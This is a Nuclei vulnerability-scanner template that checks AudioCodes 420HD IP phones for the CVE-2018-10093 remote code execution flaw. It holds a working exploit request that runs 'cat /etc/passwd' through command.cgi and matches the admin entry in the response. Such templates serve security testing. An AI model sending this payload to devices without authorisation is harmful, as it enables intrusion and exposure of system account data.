nuclei-templates/cves/2018/CVE-2018-10093.yaml

33 lines
748 B
YAML

id: CVE-2018-10093
info:
name: AudioCode 400HD - RCE
author: wisnupramoedya
severity: high
description: AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow Remote Code Execution.
reference:
- https://www.exploit-db.com/exploits/46164
- https://nvd.nist.gov/vuln/detail/CVE-2018-10093
tags: cve,cve2018,rce,iot
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2018-10093
cwe-id: CWE-862
requests:
- method: GET
path:
- "{{BaseURL}}/command.cgi?cat%20/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "admin:.*:"
- type: status
status:
- 200